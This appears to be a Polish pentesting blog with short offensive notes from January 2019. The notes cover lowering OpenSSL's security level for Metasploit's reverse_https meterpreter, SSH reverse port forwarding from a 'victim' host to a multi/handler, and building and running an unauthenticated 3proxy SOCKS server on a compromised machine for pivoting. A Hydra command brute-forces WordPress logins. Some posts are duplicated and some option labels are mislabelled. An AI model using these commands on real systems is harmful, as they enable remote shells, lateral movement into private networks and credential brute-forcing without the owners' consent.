If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.
in /etc/ssl/openssl.cnf
from
CipherString=DEFAULT@SECLEVEL=2
to
CipherString=DEFAULT
środa, 30 stycznia 2019
wtorek, 29 stycznia 2019
Przekazywanie portu w Linux np. dla Metasploit
Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący
W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH
W tym celu na komputerze B dodać:
do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd
Na komputerze A wykonać polecenie:
ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b
Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444
Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący
W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH
W tym celu na komputerze B dodać:
do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd
Na komputerze A wykonać polecenie:
ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b
Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444
Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888
środa, 23 stycznia 2019
Pivoting
Jeśli potrzebujesz z serwera, na którym zdobyłeś powłokę dostać się do zasobów sieci lokalne to użyj 3proxy
Serwer na którym zdobyłeś powłokę:
wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz
tar zxvf 0.8.12.tar.gz
cd 3proxy
make -f Makefile.Linux
cp src/3proxy .
printf "auth none\nsocks -p31337\n" > 3conf
./3proxy 3conf &
Teraz masz socks proxy nasłuchujące na porcie 31337 i możesz użyć np proxychains
BONUS:
https://github.com/klsecservices/rpivot <- reverse proxy
czwartek, 10 stycznia 2019
Hydra cheat sheet
Wordpress:
hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'
hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'
Subskrybuj:
Posty (Atom)